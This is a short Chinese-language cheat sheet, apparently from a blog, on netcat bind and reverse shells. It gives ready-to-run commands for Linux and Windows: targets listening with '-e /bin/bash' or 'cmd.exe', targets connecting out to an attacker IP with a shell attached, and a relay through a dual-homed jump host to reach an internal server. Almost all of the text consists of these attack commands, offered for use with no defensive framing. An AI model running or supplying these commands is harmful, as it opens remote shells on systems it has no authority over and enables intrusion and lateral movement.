当前位置: 首页 > article >正文

NC反弹shell

NC常见参数:

-c 指定连接后要执行的shell命令

-e 指定连接后要执行的文件名

-l 监听模式

-p 设置本地使用的通信端口

-u 使用UDP传输协议,默认是TCP

-v 显示命令执行过程,使用-vv显示更详细信息


NC——正向Shell

Linux

靶机:

nc -lvp 8888 -e /bin/bash

攻击机:

nc 靶机ip 8888

攻击机连接靶机ip 端口


Windows

靶机:

nc.exe -lvp 8888 -e cmd.exe

攻击机:

nc 靶机ip 8888


NC——反向Shell

Linux

攻击机:攻击机开启监听

nc -lvp 8888

靶机:

nc 攻击机ip 8888 -e /bin/bash

Windows

攻击机:

nc -lvp 80

靶机:

nc 攻击机ip 80 -e cmd.exe


NC——通过跳板机反弹Shell

Linux

靶机:(server2008)

nc.exe -lvp 6666 -e cmd.exe

攻击机:(kali02)

nc -lvp 8888

边界机:(kali 双网卡)

nc -nv 攻击机ip 8888 -c "nc 靶机ip 6666"

Windows

靶机:(server2008)

nc.exe -lvp 6666 -e cmd.exe

攻击机:(win702)

nc.exe -lvp 8888

边界机:(win701 双网卡)

nc.exe -nv 攻击机ip 8888 -e "nc.exe 靶机ip 6666"

然后在攻击机中执行相关命令


http://www.kler.cn/a/309204.html

相关文章:

  • 大数据面试题--kafka夺命连环问(后10问)
  • 给查询业务添加redis缓存和缓存更新策略
  • Linux——gcc编译过程详解与ACM时间和进度条的制作
  • 吾店云介绍 – 中国人的WordPress独立站和商城系统平台
  • 【设计模式】结构型模式(四):组合模式、享元模式
  • IDEA 如何手动创建spring boot工程
  • 微服务中间件之Nacos
  • Android 系统开发人员的权限说明文档
  • 解锁全球机遇:澳大利亚服务器租用市场的独特魅力
  • [C#学习笔记]Newtonsoft.Json
  • 中秋节特别游戏:给玉兔投喂月饼
  • MinIO - macOS上配置、Python调用
  • Delphi Web和Web服务开发目前有哪些选择
  • ASP.NET Core 中的 CRUD 操作
  • 游戏录屏不清楚怎么办?这些录屏技巧让画质飙升!
  • 标准的高防服务器是什么样的呢?
  • VSCode扩展连接虚拟机MySQL数据库
  • 【JavaScript】数据结构之堆
  • Python 数学建模——ARMA 时间序列分析
  • Unite Shanghai 2024 技术专场 | Unity 6及未来规划:Unity引擎和服务路线图
  • docker_持久化存储
  • 如何在Linux云服务器上解决网站截图问题
  • 【PyQt5】QWidget子类所有子类
  • 佰朔资本:股票中什么叫龙头?怎么找龙头股?
  • linux-系统管理与监控-设备管理
  • Linux 常用指令